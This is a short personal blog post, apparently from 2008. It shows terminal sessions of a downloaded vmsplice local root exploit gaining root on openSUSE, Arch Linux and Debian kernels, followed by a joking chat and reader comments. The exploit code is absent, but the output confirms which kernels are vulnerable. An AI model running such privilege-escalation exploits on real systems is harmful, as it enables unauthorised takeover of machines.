Playing with local root exploit …

I downloaded a small root exploit and tried it on my openSUSE 10.3 machine. I cannot say more; here is the result:


ionut@suse:~/Documents> uname -a
Linux suse 2.6.22.5-31-default #1 SMP 2007/09/21 22:29:00 UTC x86_64 GNU/Linux
ionut@suse:~/Documents> cat /etc/SuSE-release
openSUSE 10.3 (X86-64)
VERSION = 10.3
ionut@suse:~/Documents> gcc exploit.c -o exploit
ionut@suse:~/Documents> ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By xxxx
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2ad54ed52000 .. 0x2ad54ed84000
[+] root
suse:~/Documents #

It is so funny …

Update 1: a friend told me: “use BSD”, see here:

mitu: hm, seems to work
cmatei: now, remove all your files
dudu: now, stop being gay and use BSD
mitu: dudu, you mean linux is not BSD ?
mitu: they look the same
dudu: linux is to OSes what dacia is to cars
mitu: dacia is a car ?
dudu: my point exactly

Update 2: It seems that the exploit also works on Arch Linux and Debian Stable; see below (thanks to wonder).


[user@anaconda ~]$ ./test
-----------------------------------
Linux vmsplice Local Root Exploit
By xxxx
-----------------------------------
[+] addr: 0xc011e730
[+] root
[root@anaconda ~]# whoami
root
[root@anaconda ~]# uname -a
Linux anaconda 2.6.23-ARCH #1 SMP PREEMPT Tue Jan 15 06:34:36 UTC 2008 i686 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux


user@naboo:~$ ./deb
-----------------------------------
Linux vmsplice Local Root Exploit
By xxxx
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e55000 .. 0xb7e87000
[+] root
root@naboo:~# uname -a
Linux naboo 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
root@naboo:~# whoami
root

Comments

Your friend is right! Now try that on OpenBSD! :)

PS I’m the one who posted the FreeBSD7 slideshow on slideshare.net. Nice blog! :)

thanks, and also for slideshow :)

thank u 4 ma
